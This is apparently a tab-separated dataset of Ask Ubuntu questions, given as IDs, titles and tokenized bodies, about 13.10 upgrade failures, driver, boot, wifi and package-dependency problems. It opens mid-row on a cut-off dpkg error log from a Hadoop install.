1.cdh4.4.0.p0.23~precise-cdh4.4.0 ) ; however : package hadoop-hdfs is not configured yet . dpkg : error processing hadoop-hdfs-secondarynamenode ( -- configure ) : dependency problems - leaving unconfigured setting up cli-common ( 0.8.2 ) ... setting up libgdiplus ( 2.10-3 ) ... setting up libmono-security4.0-cil ( 2.10.8.1-1ubuntu2.2 ) ... setting up mono-4.0-gac ( 2.10.8.1-1ubuntu2.2 ) ... setting up mono-gac ( 2.10.8.1-1ubuntu2.2 ) ... * installing 6 assemblies from libgconf2.0-cil into mono * installing 1 assembly from libglib2.0-cil into mono * installing 5 assemblies from libgtk2.0-cil into mono update-alternatives : using /usr/bin/gacutil to provide /usr/bin/cli-gacutil ( global- assembly-cache-tool ) in auto mode . setting up mono-runtime ( 2.10.8.1-1ubuntu2.2 ) ... update-alternatives : using /usr/bin/mono to provide /usr/bin/cli ( cli ) in auto mode . setting up libmono-corlib4.0-cil ( 2.10.8.1-1ubuntu2.2 ) ... setting up libmono-cairo4.0-cil ( 2.10.8.1-1ubuntu2.2 ) ... setting up libmono-corlib2.0-cil ( 2.10.8.1-1ubuntu2.2 ) ... setting up libmono-i18n-west2.0-cil ( 2.10.8.1-1ubuntu2.2 ) ... setting up libmono-i18n4.0-cil ( 2.10.8.1-1ubuntu2.2 ) ... setting up libmono-i18n-west4.0-cil ( 2.10.8.1-1ubuntu2.2 ) ... setting up libmono-system4.0-cil ( 2.10.8.1-1ubuntu2.2 ) ... setting up libglib2.0-cil ( 2.12.10-2ubuntu4 ) ... * installing 1 assembly from libglib2.0-cil into mono setting up libgconf2.0-cil ( 2.24.2-1 ) ... * installing 6 assemblies from libgconf2.0-cil into mono setting up libmono-system-drawing4.0-cil ( 2.10.8.1-1ubuntu2.2 ) ... setting up libgtk2.0-cil ( 2.12.10-2ubuntu4 ) ... * installing 5 assemblies from libgtk2.0-cil into mono setting up libmono-posix4.0-cil ( 2.10.8.1-1ubuntu2.2 ) ... setting up libmono-system-core4.0-cil ( 2.10.8.1-1ubuntu2.2 ) ... setting up libmono-system-xml4.0-cil ( 2.10.8.1-1ubuntu2.2 ) ... setting up libmono-system-security4.0-cil ( 2.10.8.1-1ubuntu2.2 ) ... setting up pdfmod ( 0.9.1-5ubuntu1 ) ... setting up libmono-system-configuration4.0-cil ( 2.10.8.1-1ubuntu2.2 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : hadoop hadoop-hdfs hadoop-hdfs-datanode hadoop-hdfs-namenode hadoop-hdfs-secondarynamenode error in function : setting up hadoop ( 2.0.0+1475-1.cdh4.4.0.p0.23~precise-cdh4.4.0 ) ... chown : invalid group : `root : hadoop' dpkg : error processing hadoop ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of hadoop-hdfs : hadoop-hdfs depends on hadoop ( = 2.0.0+1475-1.cdh4.4.0.p0.23~precise-cdh4.4.0 ) ; however : package hadoop is not configured yet . dpkg : error processing hadoop-hdfs ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of hadoop-hdfs-secondarynamenode : hadoop-hdfs-secondarynamenode depends on hadoop-hdfs ( = 2.0.0+1475- 1.cdh4.4.0.p0.23~precise-cdh4.4.0 ) ; however : package hadoop-hdfs is not configured yet . dpkg : error processing hadoop-hdfs-secondarynamenode ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of hadoop-hdfs-namenode : hadoop-hdfs-namenode depends on hadoop-hdfs ( = 2.0.0+1475-1.cdh4.4.0.p0.23~precise- cdh4.4.0 ) ; however : package hadoop-hdfs is not configured yet . dpkg : error processing hadoop-hdfs-namenode ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of hadoop-hdfs-datanode : hadoop-hdfs-datanode depends on hadoop-hdfs ( = 2.0.0+1475-1.cdh4.4.0.p0.23~precise- cdh4.4.0 ) ; however : package hadoop-hdfs is not configured yet . dpkg : error processing hadoop-hdfs-datanode ( -- configure ) : dependency problems - leaving unconfigured not sure what to do !
360992	can not mount sd card	i ca n't mount my sd card : here is the error message : can not mount ... rejected send message , 3 matched rules ; type= '' method_call '' , sender= '' :1.12 '' ( uid=1002 pid=3353 comm= '' exo-mount -n -h /org/freedesktop/hal/devices/volum '' ) interface= '' org.freedesktop.hal.device.volume '' member= '' mount '' error name= '' ( unset ) '' requested_reply=0 destination= '' org.freedesktop.hal '' ( uid=0 pid=2407 comm= '' /usr/sbin/hald `` ) )
360993	ubuntu 13.10 on toshiba satellite p50-a-11k	i have a toshiba satellite p50-a-11k and am trying to boot on the new ubuntu 13.10 cd disk but i end up with a blank screen , it does not work . i was running the previous version of ubuntu on this computer and when i upgraded it would n't start . do i have to install the older version again or will this problem be fixed ?
360994	get windows loader before ubuntu loader	i have installed ubuntu 12.04 in my computer with windows 7 on it . most of my games are installed in windows.so i would usually load into windows . after installing ubuntu , it is the loader of ubuntu that shows up before that of windows . i this question i would like to know to make the windows loader to appear before that of windows and to have a link in the windows loader to the ubuntu loader like the one that is in the ubuntu loader .
360999	how can i play team fortress 2 ( tf2 ) with bumblebee in ubuntu 13.10 ?	previously in ( k ) ubuntu 13.04 , i could play team fortress 2 ( tf2 ) on my nvidia-optimus laptop using bumblebee . i would do this by setting its launch options in steam to ld_preload= '' libpthread.so.0 libgl.so.1 '' __gl_threaded_optimizations=1 optirun % command % since the upgrade to ( k ) ubuntu 13.10 , tf2 will not start from steam . using the hl2-optirun.sh script from the above answer also fails on the terminal with ./hl2_linux : error while loading shared libraries : libturbojpeg.so : can not open shared object file : no such file or directory how can i get tf2 to run ?
361002	very slow system after installing 13.10 ?	just `` upgraded '' from 13.04 to 13.10 on my acer c7 ubuntu 'd chromebook and first thing i noticed is that everything is very slow and unresponsive . hardly had this on 13.04 . opened system monitor to check processes and i saw that compiz is consistently using 20-80 % of my cpu , even on idle . i tried installing compizconfig , but it does n't start up at all . this is the final release , not a beta . how can i make it more responsive - like it should be ?
361003	how to install intel graphics driver for ubuntu 13.10	i have two graphics cards : 3rd generation intel® core™ processors with intel® hd graphics 4000 nvidia geforce gt 640m le . i tried to install nvidia-current , but it seems not compatible . after i reboot my computer , it does not display anything . then i go recovery mode and type : lshw -c video it shows the above two graphics cards , but with *-display unclaimed . also , when i try to echo $ display , it shows nothing .
361004	ubuntu 13.10 - black screen after login session	yesterday , the system asked me if i wanted to upgrade to 13.10 from 13.04 . since that was the first time for me , i decided to proceed and ran the installation without worrying about it . after the system completed the upgrade , my pc was rebooted and the new version of ubuntu signalled that the desktop would have run in low graphigs mode due to a graphical driver problem . i could n't manage to fix the issue , so i continued with the low graphics mode ... but nothing showed up . i was n't even able to access one of the ttys . so i ended up rebooting the system and accessing the recovery mode . i uninstalled all my ati graphics drivers along with xorg-server and fglrx . after rebooting , i was able to access the login session of ubuntu , but after confirming my credentials , the desktop would n't show up , but instead a black screen appeared with the following message : system program problem detected i could n't figure out the problem and tried to restore/re-install all the graphics elements i knew . but nothing worked . the screen still remains black and wo n't show the icons nor the unity bar . what would you advise me to do ? should i try launching a fresh install of the os from the live cd ? thank you .
361010	localstorage on ubuntu sdk and ubuntu touch ?	well , the thing is that i created an app with localstorage from qtquick and last week it was working well until some update come . i use the localstorage and the file storage.js that i downloaded from http : //bazaar.launchpad.net/~vthompson/ubuntu-reddit-app/ubuntu-reddit-app/files it was working very well but since last weekend it does n't work anymore on the phone , even i reinstalled ubuntu touch with the new stable version ( r100 ) and it does n't work but on the desktop it works . and other thing is that now i have to install the app before trying it on the phone because if i want to run it on the phone i get an error message saying bash : can not set the terminal process group ( -1 ) bash : no job control in this shell
361011	qtcreator creates unwanted windows	this issue occurs on raring with the build `` qtcreator 2.8.1-0ubuntu1~raring1~test1 '' , the latest from the software center . it works fine in general , but if you click on `` welcome '' and than on `` develop '' , `` examples '' or `` tutorials '' some unwanted windows appear . here is an image of the behaviour : furthermore , there is a specific pattern . if you click on `` develop '' , four windows appear . if you click on `` examples '' , two windows appear . and if you click on `` tutorials '' , one window appears . after that , you ca n't use the ide anymore . sometimes i have to kill the process with kill on the terminal . except from this issue everything works fine . you can create projects , modify code , build it and run it .
361013	canopy ide unexpected error	when trying to run canopy i get the following error . can anybody please help with the error below in the terminal /home/jaffels/canopy/bin/python : 1 : /home/jaffels/canopy/bin/python : elf : not found /home/jaffels/canopy/bin/python : 9 : /home/jaffels/canopy/bin/python : syntax error : `` ) '' unexpected it also creates a file with the following name : � @ @ �c @ 8 @ ( invalid encoding )
361014	replicate parts of a window on another location	i 'm looking for a software that does the same as `` ontopreplica '' , available for windows . in short : i want to select a part of a window and have that part be always on top , but at a location that i can move around . basically a zoom with a movable window , if you can get what i mean . how would i best do that ? to add : the tool xzoom would be perfect - if it could magnify/display a window that is not on top .
361015	ubuntu 12.04 zoneminder 1.25 issues	i am extremely new to ubuntu and zoneminder , so please bare with me and my questions . i will be as detailed as i possibly can with the problem i am having . i have spent literally a week reading forums trying to get this to work ... up until a week ago we had ubuntu 11.10 with zoneminder 1.23 ( i think ) with 7 cameras running on the system over the network . then a few things went wrong and now we are sitting with the following setup : pc : - dell optiplex 360 - core2duo e5200 2.5ghz - 2gb ram ubuntu desktop 12.04 32-bit ( [ url=http : //www.craigertech.com/zoneminder-install/ ] this [ /url ] post describes this installation ) zoneminder v1.25 cambozola v0.931 camera : - ubiquite aircam - firmware v1.1 zoneminder monitor settings : - source type : ffmpeg - function : modect - max and alarm max fps blank - ref image : 7 - source path : rtsp : // : @ 192.168.1.x:554/live/ch00_0 - source colours : 24 bit colour - capture w ( 1280px ) h ( 720px ) - timestamp and buffers tab all set to default settings - misc tab default settings except default scale : 1/2x ( i hope i have covered all the important settings ... ) [ b ] the problem : [ /b ] my current issue is that i can not get the cameras to display in zoneminder . i am able to add one specific camera ( called `` admin '' ) and it works fine ( modect works , events are created and stored without a hitch ! ) the moment i add our `` foyer '' cam it all goes downhill . the admin cam still works ( sometimes ) but the foyer cam either only displays a black box or an image placeholder , but never a stream . restarting zoneminder ( or the whole server for that matter ) cause the admin camera to do the same as the foyer camera . removing the foyer cam does not fix the admin cam . however , if i add the admin cam and the add `` principals office '' , both cameras work perfectly . full functionality . the hardware we are using has not changed . before , the system would handle 8 cameras and cpu usage did n't go above 40 % . now , when and if two cameras decide to work , the cpu is maxed out ... [ b ] what have i tried ? [ /b ] i have made certain that the cameras on board settings are identical . enabling and disabling rtsp authentication makes no difference . before all of this started , the original server did not require the rtsp auth on the cameras at all . i have triple checked the monitor settings in zoneminder . i got these settings off of the ubiquiti forums . other people are using the same cameras , versions and configuraion as i am with success . i have increased the shared memory on the server after receiving some sort of shared memory error ( which does n't seem to be coming up anymore ) . running `` ipcs -l '' gives me the following values after increasing shared memory : -- -- -- shared memory limits -- -- -- max number of segments = 4096 max seg size ( kbytes ) = 524288 max total shared memory ( kbytes ) = 1342177280 min seg size ( bytes ) = 1 -- -- -- semaphore limits -- -- -- max number of arrays = 128 max semaphores per array = 250 max semaphores system wide = 32000 max ops per semop call = 32 semaphore max value = 32767 -- -- - message limits -- -- - max queues system wide = 1718 max size of message ( bytes ) = 8192 default max size of queue ( bytes ) = 16384 i have gone through the zoneminder web interface error log ( i have no clue where to look for error logs in the server itself ) and found the following errors : - level : fat pid : 5687 message : unable to decode frame at frame 0 - level : err pid : 5085 message : 'zmc -m x ' exited abnormally , exit status 255 [ x = camera number ] - level : err pid : 6275 message : failed to capture image from monitor 6 ( 0/1 ) - level : err pid : 6275 message : captured image does not match expected size , check width , height and colour depth i have googled myself silly and i can not find anything on these errors or how to fix them and i do n't what role they play in my current situation . i have done a few other things that i ca n't even remember anymore as i have read so many posts . lastly , i have run around in circles screaming , lost hours of sleep and i think i grew a few more gray hairs ... zoneminder does n't seem to care : cry : thank you for reading ! best regards , marcus
361017	ca n't use flash in ubuntu 13.10	since i upgraded to ubuntu 13.10 , my flash is n't working anymore in firefox or opera . it only works in google chrome as it is included in the browser . i did check that i have flash plugin for firefox and so on installed . everthing did work before the upgrade . when i try to install from adobe 's website , it doens't pick up anymore the apt installer/ software center . you have to physically to go and look for the correct program to install flash , but i do n't know where to look for it or choose it . is there a other way like in terminal or somewhere else to reinstall it ? or what can i do ?
361018	w : duplicate sources.list entry ubuntu 13.10	after going for an upgrade from 13.04 , i get this when i sudo apt-get update ... ( had to make a line in the http links in order just to post this question since i dont have enough 'reputation ' ) w : duplicate sources.list entry h ttp : //security.ubuntu.com/ubuntu/ saucy-security/main amd64 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_saucy-security_main_binary-amd64_packages ) w : duplicate sources.list entry h ttp : //security.ubuntu.com/ubuntu/ saucy-security/restricted amd64 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_saucy-security_restricted_binary-amd64_packages ) w : duplicate sources.list entry h ttp : //security.ubuntu.com/ubuntu/ saucy-security/main i386 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_saucy-security_main_binary-i386_packages ) w : duplicate sources.list entry h ttp : //security.ubuntu.com/ubuntu/ saucy-security/restricted i386 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_saucy-security_restricted_binary-i386_packages ) ... .. now this is my sources.list : deb h ttp : //archive.ubuntu.com/ubuntu/ saucy main restricted deb h ttp : //security.ubuntu.com/ubuntu/ saucy-security main restricted deb h ttp : //archive.ubuntu.com/ubuntu/ saucy-updates main restricted deb h ttp : //dk.archive.ubuntu.com/ubuntu/ saucy main restricted deb-src h ttp : //dk.archive.ubuntu.com/ubuntu/ saucy main restricted deb h ttp : //dk.archive.ubuntu.com/ubuntu/ saucy-updates main restricted deb-src h ttp : //dk.archive.ubuntu.com/ubuntu/ saucy-updates main restricted deb h ttp : //dk.archive.ubuntu.com/ubuntu/ saucy universe deb-src h ttp : //dk.archive.ubuntu.com/ubuntu/ saucy universe deb h ttp : //dk.archive.ubuntu.com/ubuntu/ saucy-updates universe deb-src h ttp : //dk.archive.ubuntu.com/ubuntu/ saucy-updates universe deb h ttp : //dk.archive.ubuntu.com/ubuntu/ saucy multiverse deb-src h ttp : //dk.archive.ubuntu.com/ubuntu/ saucy multiverse deb h ttp : //dk.archive.ubuntu.com/ubuntu/ saucy-updates multiverse deb-src h ttp : //dk.archive.ubuntu.com/ubuntu/ saucy-updates multiverse deb h ttp : //dk.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb-src h ttp : //dk.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb h ttp : //security.ubuntu.com/ubuntu saucy-security main restricted deb-src h ttp : //security.ubuntu.com/ubuntu saucy-security main restricted deb h ttp : //security.ubuntu.com/ubuntu saucy-security universe deb-src h ttp : //security.ubuntu.com/ubuntu saucy-security universe deb h ttp : //security.ubuntu.com/ubuntu saucy-security multiverse deb-src h ttp : //security.ubuntu.com/ubuntu saucy-security multiverse deb h ttp : //archive.canonical.com/ubuntu saucy partner deb-src h ttp : //archive.canonical.com/ubuntu saucy partner deb h ttp : //extras.ubuntu.com/ubuntu saucy main deb-src h ttp : //extras.ubuntu.com/ubuntu saucy main ... .. where does the fault seem to be ?
361021	the iso image made with remastersys boot only with the livecd mode	i have made an image of my ubuntu 12.04 system with remastersys but the only problem is that i can install it . when i take `` the live boot option '' or only `` the intallation mode '' i just have the live system with not installation icon . can someone help me ?
361022	how to disable mouse power status in indicator-power ?	today i have updated to ubuntu 13.10 and got mouse power status . but i did n't need it . and also ubuntu does n't know how long the mouse will work and shows an ugly `` estimating ... '' . how do you show only the battery status ?
361024	select text with double click	i 'm a former mac user and i was used to select a word in a text just by double clicking on it , and selecting the whole paragraph by triple-clicking any word of the paragraph . this feature works on any software with mac os . how could i configure my ubuntu to behave the same way ? i am using ubuntu 13.4 with unity . in the current configuration , when i double-click , the click is held , just like if i were holding the mouse-click . this happens whatever the application .
361027	upgrade ubuntu 13.04 to 13.10 stable	how i can upgrade the distribution to 13.10 ? i have used sudo apt-get install update-manager-core sudo do-release-upgrade but it only upgrade to raring . so i want to know how i upgrade it
361029	wifi not working after upgrading from 12.04 to 13.10	i went through loads of posts looking for an answer to my wifi problems but ca n't seem to fix it . i had ubuntu 12.04 installed and wifi worked fine with no issues whatsoever but then i upgraded to 13.10 it has stopped working . it shows the available networks but i ca n't connect to any of them it just does that animation thing then stops working . update heres the link to pastebin : http : //pastebin.com/gymmeyhv and heres what wifi card i have and driver lspci : 01:00.2 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 0a ) subsystem : hewlett-packard company device [ 103c:18de ] kernel driver in use : r8169 02:00.0 network controller [ 0280 ] : ralink corp. rt3290 wireless 802.11n 1t/1r pcie [ 1814:3290 ] subsystem : hewlett-packard company device [ 103c:18ec ] kernel driver in use : rt2800pci
361040	eclipse menus are cut off or do n't show	i 'm using ubuntu 13.10 ( with jdk 1.7.0_45 ) . i 've downloaded and uncompressed eclipse kepler for java ee developers . the software menus are messed up . i did n't notice similar problems in other software . when i click any menu in eclipse , the drop-down seems to be `` cut '' . sometimes the drop-down shows , but the options are invisible . i tried eclipse indigo , but the same problem occurs .
361044	i downloaded a ppa and now what ?	i downloaded a ppa successfully ( i think ) and now i what to run the program . i have now idea how to . i am new to ubuntu . here is the ppa i downloaded : ppa : stebbins/handbrake-releases . then in terminal i ran the following : sudo apt-get update then the instruction say now you 're ready to install your program but end there . what do i do next ? thanks
361046	duplicity script	is there a duplicity script available to run [ cron ] from root and backup /home directories ( no matter how many users i have ) to a ubuntu one cloud account . i will want to exclude all their /downloads directories .
361050	is the indicator documentation removed ?	at the start of the week i started developing my indicator program and the documentation has disappeared since then . is there plans to remove the functionality or something like that ?
361056	12.04 udevd [ 1519 ] : failed to execute '/lib/udev/modem-modeswitch ' after update	after update some package ( i ca n't remember and i do n't know how to check which have just update ) and reboot , i ca n't restart unity or compiz . here are some output while i check system in recovery mode : udevd [ 1519 ] : failed to execute '/lib/udev/modem-modeswitch ' 'lib/udev/modem-modswitch -- vendor 0x12d1 -- product 0x1001 -- type option-zerocd ' : no such file or directory some output in normal mode : unity warning : no display variable set , setting it to :0 unity-panel-service : no process found compiz ( core ) - fatal : could n't open display :0
361057	new to ubuntu - windows expert seeking advice	i 'm a .net developer ( how i earn a living ) . i would like to learn ubuntu . i 've installed ubuntu desktop 12.04 on my macair inside a parallels vm and it runs perfectly . i 'm pumped ! now , i 'd like to find some documentation specifically for newbs . i did a book search for `` ubuntu '' on amazon and did n't find much . does anyone have any advice for me , or links to documentation specifically targeted to newbs ?
361058	hibernate option does n't appear in the shutdown menu ( s )	in 13.04 , i enabled hibernation by following these instructions : you can also enable the hibernate option in the menus . to do that , use your favorite text editor to create /etc/polkit-1/localauthority/50-local.d/com.ubuntu.enable-hibernate.pkla . add the following to the file and save : [ re-enable hibernate by default ] identity=unix-user : * action=org.freedesktop.upower.hibernate resultactive=yes it worked fine in 13.04 , but after upgrading to 13.10 , the `` hibernate '' option no longer appears in the top right corner shutdown/login menu and neither in the menu that comes up when i press the laptop 's power button ( image here ) . yes , i have checked that the the .pkla file is still there untouched . what could be the problem ? hibernate itself still works when i do it from the terminal with pm-hibernate . edit : similar question : hibernation is still missing from menu in 13.10 after enabling via polkit . how to enable ?
361068	port forwarding as sip tunnel	i have an ubuntu machine that connected to 2 networks . 192.168.1.0/24 and 192.168.2.0/24 my machine has two ip addresses -- 192.168.1.50 and 192.168.2.50 i have sip server on 192.168.2.250 but wireless are on 192.168.1.xxx network . so , i 'm try to make the tunnel on my machine , so , my sip client on my phone can connect to sip server on difference network . i have try port forwarding # 5060 as other similar thread here but it not work . are there anyway i can do that with iptables ?
361070	how to map xrandr output names to /sys/class/drm display names ?	i am using the 'udev library libudev ' to detect connection and disconnection of displays ( monitors ) on my system . the display names reported by udev are found in the /system/class/drm directory on my system . the names look like the following : card0-dp-1 card0-hdmi-a-1 i am also using xrandr , which reports display names that look like the following : dp1 hdmi1 clearly , the two libraries are talking about the same names , but the names themselves differ . can anyone out there tell me how i can map the names found under the /sys/class/drm virtual file system with the names reported by 'xrandr ' ?
361074	dual installed ubuntu 13.10 with windows 7 does not boot	dual installing ubuntu 13.10 with windows 7 was successful . i was asked to re-start and when i did it will not reboot . i received error message indication a `` folder/drive '' does not exist . then a command prompt dialog `` grub rescue > '' opened . i have no idea what it is and what commands i should enter . i tried to re-install ububtu and it showed that i have both windows 7 and ubuntu installed and gave reinstall options . there was no option to delete/remove just ubuntu . i am stuck , and need help .
361076	ubuntu 13.04 to 13.10 login probelm	after upgrading to 13.10 from 13.04 ubuntu . i have kept the downloading and insatllation process over night and due to power cut system shutdown itself . i am sure that downloading and installation is over by the time the power goes off . now , i am unable to login into system . system hangs after giving user password . it is giving error and asking us want to report the problem . the mouse cursor unable to select the ok button and system not responding . how to repair ? i have lot of data in my 13.04 ubuntu . kindly suggest me recovery process . i am using windows 8 as dual boot .
361077	reinstall ubuntu 13.04 over 13.10 installation stuck	i screwed up my ubuntu 13.10 installation because of its instability and choose to reinstall 13.04 . when running the ubuntu 13.04 installer it gave me the option to erase ubuntu 13.10 and reinstall 13.04 . problem is it wo n't go further than this screen for over an hour now . is this normal ? because normally you get more screens like keyboard and time setup . or is is already erasing ubuntu 13.10 now without telling me ? i am running ubuntu next to windows 7 .
361080	“unity-lens-photos” and `` unity-lens-applications '' do n't show search results . ubuntu 13.10	new version unity is so bugy for me . sometimes hud do n't show me apps and i ca n't search in “unity-lens-photos” . there are no photos currlently available on this computer . i have meny images , photos on my disk and i connected ubuntu with my facebook account . this lens shoud show my frends photos . aoplications lens is not big problem . if i restart computer everything is ok. do u have any idea how to fix it ?
361082	steam - opengl glx context is not using direct rendering , which may cause performance problems	i have an amd radeon 7950 and installed the drivers manually from the amd website . i use the beta drivers , and they worked perfectly fine back on 13.04 in xubuntu , but as soon as i use ubuntu , the drivers now say the dri is not enabled . outputs below : opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7900 series opengl core profile version string : 4.3.12458 core profile context 13.20.16 opengl core profile shading language version string : 4.30 opengl core profile context flags : ( none ) opengl core profile profile mask : core profile opengl core profile extensions : opengl version string : 4.3.12458 compatibility profile context 13.20.16 opengl shading language version string : 4.30 opengl context flags : ( none ) opengl profile mask : compatibility profile opengl extensions : when doing dist-upgrade from xubuntu 13.04 to 13.10 , the os will no longer boot , showing a black screen forever , disallowing access to non-gui terminal access via ctrl+alt+f1-6 . when running steam as a command , here is the non-verbose output : http : //pastebin.com/yxm9u5c6 here is the verbose output : http : //pastebin.com/8v8ppjbl
361084	how to install ia32-libs ?	today i updated from 13.04 to 13.10 . then sudo apt-get autoremove removed all 32bit packages . how to get them back ? how do i install ia32-libs again ? this is what i get if i try to install them back : output $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : lib32z1 lib32ncurses5 lib32bz2-1.0 e : package 'ia32-libs ' has no installation candidate
361085	codeblocks install failed . dependency not resolved , libgcc1	i am trying to install codeblocks using ubuntu software center . i found it but when install , i get dependency not resolved . my system ubuntu 12.04 , 32-bit . codeblocks : depends : libgcc1 ( > =1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : codeblocks-common ( =10.05-2 ) but 12.11-2 is to be installed . i went to codeblocks `` more info '' button in ubuntu software center and selected all the add-ons for codeblocks . apply changes and now i get an additional ( to the two above ) dependency message : depends : libwxsmithlib0 ( =10.05-2 ) but 12.11-2 is to be installed .
361089	changing the ubuntu 13.10 ambiance colours	in previous versions of ubuntu ( including ubuntu 13.04 ) i was able to change the system ambiance colour from orange to a colour of my liking by using this in the terminal : gsettings set org.gnome.desktop.interface gtk-color-scheme `` selected_bg_color : # 33b5e5 ; selected_fg_color : # ffffff '' this would ultimately change the orange ambiance colour to # 3385e5 which is a blue colour . does anyone know how i can go about changing it once again in ubuntu 13.10 ?
361090	installing google chrome in ubuntu 13.10 error [ how-to ]	install google chrome in google website , double click the downloaded file , opened up in ubuntu software centre , when i click install , on the left besides install button it says `` only install this file if you trust the origin '' note : using ubuntu 13.10 64bit
361096	is it possible to transcode a video file with an ifs extension ?	i have recovered video files recorded from a camera dvr which has an embedded linux system and compresses in h264 , the files are .ifs and i need to be able to make these files viewable on any computer but i can only view them on my ubuntu machine using the media player with extra codecs . does anyone know what software i could use to transcode these .ifs files to edit and make them viewable on a windows machine ?
361099	accidentally deleted .bashrc on usb stick ubuntu 12.04	i have a 16gb flash drive i have setup to run ubuntu 12.04 from . while using it , i accidentally deleted .bashrc , and rebooted the system not realizing the file was gone . now ubuntu just hangs on the load . i have setup another flash drive with 13.10 , in an attempt to mount the 12.04 flash drive and add the .bashrc file back in . when i mount the drive , my home directory where .bashrc would live , is not there . i did some research and found that most likely the directories are encrypted , and ran through the `` recovering your data automatically '' step of this post : < https : //help.ubuntu.com/community/encryptedprivatedirectory # recovering % 20your % 20data % 20manually > but after running sudo ecryptfs-recover-private /media/usb successfully , nothing changed in the mounted drive . how can i get to my home directory to add the .bashrc file back in so i can boot this drive again ?
361103	how to install in a mac air	my mac os x lion , got corrupted . i am using a mac air 2011 , which came with pre-installed os x , and no usb stick or dvd-rom . is that possible that i can install linux on my mac , with the help of a bootable usb , ignoring os x .
361104	pgrep pattern length limit	pgrep returns nothing if the pattern length is longer than 15 characters . i ca n't find anything in the man page about maximum pattern length . is this a bug ? for purposes of exposition i created a process called 12345678901234567890 $ pgrep 12345678901234 5367 $ pgrep 123456789012345 5367 $ pgrep 1234567890123456 $
361112	ubuntu 13.10 freezing on splash screen ( boot screen ) after upgrade from 13.04	i just updated my ubuntu 13.04 to 13.10 using the built in update software . after the restart it asked me to do , the system is stuck , frozen on the splash screen ( ubuntu logo with all circles orange , the boot screen ) . i 'm running on a lenovo ideapad y510p duel booting with windows 8 . i would like all my files and programs to be kept as they are so please do n't suggest formatting .
361116	ubuntu 13.10 wo n't reboot after stalled upgrade	while upgrading to 13.10 , my system froze and required a hard reboot . after rebooting , it appears that 13.10 did actually install , but i can not reboot . system freezes on the purple ubuntu screen . this happens for all reboot methods i could think of including alt+prtscn+b . shutdown works fine . any ideas ?
361119	ubuntu 13.10 running slowly due to xorg	i 'm having a bit of an issue with my new ubuntu 13.10 installation . the user interface seems to be running very slowly . upon investigation ( running top in the command line ) , it appears that xorg is running continuously and is consuming the bulk of my processing power . is there a reason why this is happening ? does this have something to do with my graphics driver ? below is my graphics driver options : is it best if i use the proprietary ones ? i 've had far too many bad experiences with changing drivers , so now as a result i 'm overly cautious .
361120	practical to upgrade kernel but not version ?	before 13.10 came out , i tried it , and i frequently had errors , so i 'm afraid to upgrade . i 've had to go further into ubuntu than i thought i would to get it working well with all drivers and sparse errors . i had to use a mainline kernel with 13.04 to get my audio working . i now upgrade that to the latest mainline whenever it comes out , keeping the older mainline that worked until i can verify the new one works , and so on . i currently use catalyst 13.8 beta for video to work . in short , my hardware is hanging on by a thin thread ( as opposed to an older laptop that works perfectly from a regular 13.04 install and was resurrected from windows paralysis by ubuntu ) . is it practical to only upgrade the kernel , or will my computer eventually `` stop working '' because the supporting software from a later version is not available and unable to be installed ? in short , will i be forced to upgrade one day to use the latest kernels ? downgrading seems extremely difficult , and i 'm not able to set aside the time for a backup and reinstall .
361127	after removing ubuntu builder there is still folder in home directory . why ? how to remove it ?	i removed ubuntu builder using synaptic with option mark for complete removal . i thought that gon na delete folder ( made by ubuntu builder ) in home dir , but it 's not . afaik mark for complete removal is same as purging , and that should delete all files made by program . am i wrong ? is it safe to delete it with sudo rm -r /home/ubuntu-builder because it is in home dir ? and last question . why is it made folder in /home instead in ~/ dir ?
361128	why did 13.10 break my custom keyboard layout ?	i was using a custom keyboard layout . basically i modified the us-mac layout to fit my ideal of a math-heavy version of the regular us layout that also throws german umlauts into mix . it went well and worked marvelously for 6 consecutive versions of ubuntu . today 's version upgrade ( from 13.04 to 13.10 ) broke that streak . i now have the usual crappy macintosh-layout . now xkb just ignores my layout and all of the other changes i make in /usr/share/x11/xkb/symbols/us ( tried to switch '0 ' and '9 ' everywhere and rebooted - no effect ) . why is that ? i suspect i have to do an extra step now for the changes to take effect or something like that . anyone care to point me in the right direction ?
361130	why does ubuntu complaint that my sd card is in use when it is not ? how do i establish the connection to this device ?	my iogear sd card reader/writer is recognized on ubuntu ( by using vm ware ) but when i try to connect to `` removable devices - > alcor micro flash card reader/writer '' , the following message appears : the connection for the usb device `` alcor micro flash card reader/writer '' was unsuccessful . the device is currently in use . but i think it is not used . should i use iogear driver for this one ? when i connect the card reader , ubuntu automatically recognized the `` alcor micro flash card reader/writer '' . how can i fix the problem ? $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0b95:7720 asix electronics corp. ax88772 bus 002 device 002 : id 0e0f:0003 vmware , inc . virtual mouse bus 002 device 003 : id 0e0f:0002 vmware , inc . virtual usb hub bus 002 device 004 : id 0e0f:0008 vmware , inc . bus 002 device 005 : id 0403 : bcda future technology devices international , ltd vmware log : 2013-10-18t09:00:07.494-06:00| vmx| i120 : usb-ccid : could not establish context : scard_e_no_service ( 0x8010001d ) . 2013-10-18t09:00:07.494-06:00| vmx| i120 : usb-ccid : could not establish context : scard_e_no_service ( 0x8010001d ) .
